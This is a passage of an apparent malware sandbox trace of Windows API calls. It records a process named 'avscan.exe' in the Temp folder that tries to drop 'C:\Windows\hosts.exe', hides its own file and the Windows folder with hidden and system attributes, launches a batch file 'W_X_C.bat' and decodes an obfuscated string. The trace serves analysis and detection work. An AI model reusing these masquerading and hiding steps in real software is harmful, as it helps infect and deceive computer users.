(dwErrCode=0x20) [0142.302] GetLastError () returned 0x20 [0142.302] SetLastError (dwErrCode=0x20) [0142.302] GetLastError () returned 0x20 [0142.302] SetLastError (dwErrCode=0x20) [0142.302] GetLastError () returned 0x20 [0142.302] SetLastError (dwErrCode=0x20) [0142.302] GetLastError () returned 0x20 [0142.302] SetLastError (dwErrCode=0x20) [0142.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0142.302] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x1159774, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0142.303] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f4b4) [0142.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0142.304] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x1159774, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0142.304] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f58c) [0142.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0142.305] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x1159774, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0142.305] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f58c) [0142.717] FileSystemObject:IDispatch:Invoke (in: This=0xf22cec, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f698, puArgErr=0x28f6c8 | out: pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Windows" (normalized: "c:\\windows"), varVal2=0x0), pExcepInfo=0x28f698*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6c8*=0x50) returned 0x0 [0142.718] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28fa0c, pvarResult=0x28f8f0 | out: pvarResult=0x28f8f0) returned 0x0 [0142.718] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f484, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0142.718] lstrcpynA (in: lpString1=0x28f370, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0142.718] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0142.718] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0142.718] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0142.718] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0142.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", cbMultiByte=-1, lpWideCharStr=0x114cb54, cchWideChar=37 | out: lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 37 [0142.719] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0142.719] GetModuleFileNameA (in: hModule=0x400000, lpFilename=0x28f484, nSize=0x104 | out: lpFilename="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe")) returned 0x2f [0142.719] lstrcpynA (in: lpString1=0x28f370, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", iMaxLength=260 | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0142.719] lstrlenA (lpString="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned 47 [0142.719] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebcd0 [0142.719] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x30) returned 0x10ebd08 [0142.719] lstrcpyA (in: lpString1=0x10ebcd0, lpString2="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" | out: lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe") returned="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" [0142.719] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="avscan", cbMultiByte=-1, lpWideCharStr=0x1159774, cchWideChar=7 | out: lpWideCharStr="avscan") returned 7 [0142.719] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebd40 | out: hHeap=0x10d0000) returned 1 [0142.720] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f3c8, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0142.720] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f4f8, lpFilePart=0x28f3c0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f3c0*="avscan.exe") returned 0x2f [0142.720] CreateFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\avscan.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x28f4b8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0142.720] GetFileType (hFile=0x15c) returned 0x1 [0142.720] IMalloc:Alloc (This=0x76da66bc, cb=0x6c) returned 0x11514c8 [0142.721] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0142.721] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x1442557 [0142.721] SetFilePointer (in: hFile=0x15c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0143.921] IMalloc:Alloc (This=0x76da66bc, cb=0x2884a9a) returned 0x63b0020 [0146.064] ReadFile (in: hFile=0x15c, lpBuffer=0x63b0020, nNumberOfBytesToRead=0x144254d, lpNumberOfBytesRead=0x28f558, lpOverlapped=0x0 | out: lpBuffer=0x63b0020*, lpNumberOfBytesRead=0x28f558*=0x144254d, lpOverlapped=0x0) returned 1 [0147.188] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="MZ\x90", cbMultiByte=21243213, lpWideCharStr=0x3b20024, cchWideChar=21243213 | out: lpWideCharStr="MZ\x90") returned 21243213 [0147.423] IMalloc:Free (This=0x76da66bc, pv=0x63b0020) [0147.681] CloseHandle (hObject=0x15c) returned 1 [0147.681] IMalloc:Free (This=0x76da66bc, pv=0x11514c8) [0147.681] GetLocalTime (in: lpSystemTime=0x28f5d4 | out: lpSystemTime=0x28f5d4*(wYear=0x7e8, wMonth=0x4, wDayOfWeek=0x6, wDay=0x1b, wHour=0xb, wMinute=0x1a, wSecond=0x33, wMilliseconds=0x1aa)) [0147.682] VarDateFromUdate (in: pudateIn=0x28f5f8, dwFlags=0x0, pdateOut=0x28f5d4 | out: pdateOut=0x28f5d4) returned 0x0 [0147.682] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows\\hosts.exe", cchWideChar=-1, lpMultiByteStr=0x28f3c8, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows\\hosts.exe", lpUsedDefaultChar=0x0) returned 21 [0147.682] GetFullPathNameA (in: lpFileName="C:\\Windows\\hosts.exe", nBufferLength=0x104, lpBuffer=0x28f4f8, lpFilePart=0x28f3c0 | out: lpBuffer="C:\\Windows\\hosts.exe", lpFilePart=0x28f3c0*="hosts.exe") returned 0x14 [0147.682] CreateFileA (lpFileName="C:\\Windows\\hosts.exe" (normalized: "c:\\windows\\hosts.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x28f4b8, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.683] GetLastError () returned 0x20 [0147.683] GetLastError () returned 0x20 [0147.683] SetLastError (dwErrCode=0x20) [0147.683] GetLastError () returned 0x20 [0147.683] SetLastError (dwErrCode=0x20) [0147.683] GetLastError () returned 0x20 [0147.683] SetLastError (dwErrCode=0x20) [0147.683] GetLastError () returned 0x20 [0147.683] SetLastError (dwErrCode=0x20) [0147.684] GetLastError () returned 0x20 [0147.684] SetLastError (dwErrCode=0x20) [0147.684] GetLastError () returned 0x20 [0147.684] SetLastError (dwErrCode=0x20) [0147.684] GetLastError () returned 0x20 [0147.684] SetLastError (dwErrCode=0x20) [0147.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0147.684] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x1159774, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0147.684] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f4b4) [0147.685] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0147.687] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x1159774, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0147.687] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f58c) [0147.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 12 [0147.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="ProjShell32", cbMultiByte=-1, lpWideCharStr=0x1159774, cchWideChar=12 | out: lpWideCharStr="ProjShell32") returned 12 [0147.688] RaiseException (dwExceptionCode=0xc000008f, dwExceptionFlags=0x1, nNumberOfArguments=0x2, lpArguments=0x28f58c) [0148.206] FileSystemObject:IDispatch:Invoke (in: This=0xf22c3c, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f698, puArgErr=0x28f6c8 | out: pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f698*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6c8*=0x20) returned 0x0 [0148.207] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f9b4, pvarResult=0x28f8f0 | out: pvarResult=0x28f8f0) returned 0x0 [0148.207] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", cchWideChar=-1, lpMultiByteStr=0x28f4b8, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpUsedDefaultChar=0x0) returned 48 [0148.208] GetFullPathNameA (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", nBufferLength=0x104, lpBuffer=0x28f5ec, lpFilePart=0x28f4b0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpFilePart=0x28f4b0*="avscan.exe") returned 0x2f [0148.208] SetFileAttributesA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", dwFileAttributes=0x6) returned 1 [0148.209] FileSystemObject:IDispatch:Invoke (in: This=0xf22cec, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f698, puArgErr=0x28f6c8 | out: pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Windows" (normalized: "c:\\windows"), varVal2=0x0), pExcepInfo=0x28f698*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6c8*=0x70) returned 0x0 [0148.209] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f994, pvarResult=0x28f8f0 | out: pvarResult=0x28f8f0) returned 0x0 [0148.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x28f4b8, cbMultiByte=261, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Windows", lpUsedDefaultChar=0x0) returned 11 [0148.209] GetFullPathNameA (in: lpFileName="C:\\Windows", nBufferLength=0x104, lpBuffer=0x28f5ec, lpFilePart=0x28f4b0 | out: lpBuffer="C:\\Windows", lpFilePart=0x28f4b0*="Windows") returned 0xa [0148.209] SetFileAttributesA (lpFileName="C:\\Windows", dwFileAttributes=0x6) returned 1 [0148.210] FileSystemObject:IDispatch:Invoke (in: This=0xf22c3c, dispIdMember=0, riid=0x7295aea8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900, pExcepInfo=0x28f698, puArgErr=0x28f6c8 | out: pDispParams=0x28f6b8*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x28f900*(varType=0x8, wReserved1=0x0, wReserved2=0x18, wReserved3=0x0, varVal1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), varVal2=0x0), pExcepInfo=0x28f698*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x28f6c8*=0x20) returned 0x0 [0148.211] VarCat (in: pvarLeft=0x28f900, pvarRight=0x28f9b4, pvarResult=0x28f8f0 | out: pvarResult=0x28f8f0) returned 0x0 [0148.211] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f6a0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f6e4 | out: lpCommandLine="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\avscan.exe", lpProcessInformation=0x28f6e4*(hProcess=0x160, hThread=0x15c, dwProcessId=0xbac, dwThreadId=0xba4)) returned 1 [0148.229] GetLastError () returned 0x715 [0148.230] WaitForInputIdle (hProcess=0x160, dwMilliseconds=0x2710) returned 0x0 [0165.552] CloseHandle (hObject=0x15c) returned 1 [0165.553] CloseHandle (hObject=0x160) returned 1 [0165.553] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="c:\\windows\\W_X_C.bat", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x28f6a0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x28f6e4 | out: lpCommandLine="c:\\windows\\W_X_C.bat", lpProcessInformation=0x28f6e4*(hProcess=0x15c, hThread=0x160, dwProcessId=0xb7c, dwThreadId=0xb4c)) returned 1 [0165.582] GetLastError () returned 0x0 [0165.582] WaitForInputIdle (hProcess=0x15c, dwMilliseconds=0x2710) returned 0xffffffff [0165.582] CloseHandle (hObject=0x160) returned 1 [0165.582] CloseHandle (hObject=0x15c) returned 1 [0165.582] FileSystemObject:IUnknown:Release (This=0xf22be0) returned 0x0 [0165.583] FileSystemObject:IUnknown:Release (This=0xf22cec) returned 0x0 [0165.583] FileSystemObject:IUnknown:Release (This=0xf22c3c) returned 0x0 [0165.585] GetCurrentThreadId () returned 0xfd8 [0165.586] GetCurrentThreadId () returned 0xfd8 [0165.586] PostThreadMessageA (idThread=0xfd8, Msg=0x1069, wParam=0x0, lParam=0x0) returned 1 [0165.586] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x8, Size=0x18) returned 0x10e2b58 [0165.587] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0xc) returned 0x10e1d20 [0165.587] PeekMessageA (in: lpMsg=0x28fde8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28fde8) returned 1 [0165.587] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28fd4c) returned 0x0 [0165.588] TranslateMessage (lpMsg=0x28fde8) returned 0 [0165.588] DispatchMessageA (lpMsg=0x28fde8) returned 0x0 [0165.588] PeekMessageA (in: lpMsg=0x28fde8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x28fde8) returned 1 [0165.588] CallNextHookEx (hhk=0x1602c7, nCode=0, wParam=0x1, lParam=0x28fd4c) returned 0x0 [0165.589] IsWindow (hWnd=0x103bc) returned 1 [0165.589] GetWindowLongA (hWnd=0x103bc, nIndex=-16) returned 1140916224 [0165.589] IsIconic (hWnd=0x103b8) returned 0 [0165.589] GetParent (hWnd=0x103bc) returned 0x103b8 [0165.589] TranslateMessage (lpMsg=0x28fde8) returned 0 [0165.589] DispatchMessageA (lpMsg=0x28fde8) returned 0x0 [0165.589] KillTimer (hWnd=0x103bc, uIDEvent=0x103bc) returned 1 [0165.590] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.590] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.590] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0165.591] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.591] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.591] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.591] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0165.591] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.592] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0165.592] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.592] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.592] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0165.593] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.593] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.593] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.593] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0165.594] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.688] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.688] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.688] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11596fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0165.688] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.689] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.689] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0165.689] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.689] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f926, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìú(", lpUsedDefaultChar=0x0) returned 1 [0165.690] VarSub (in: pvarLeft=0x28f9f8, pvarRight=0x28f990, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.690] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x115979c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0165.690] VarCat (in: pvarLeft=0x28fa08, pvarRight=0x28fa18, pvarResult=0x28f9c0 | out: pvarResult=0x28f9c0) returned 0x0 [0165.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f926, 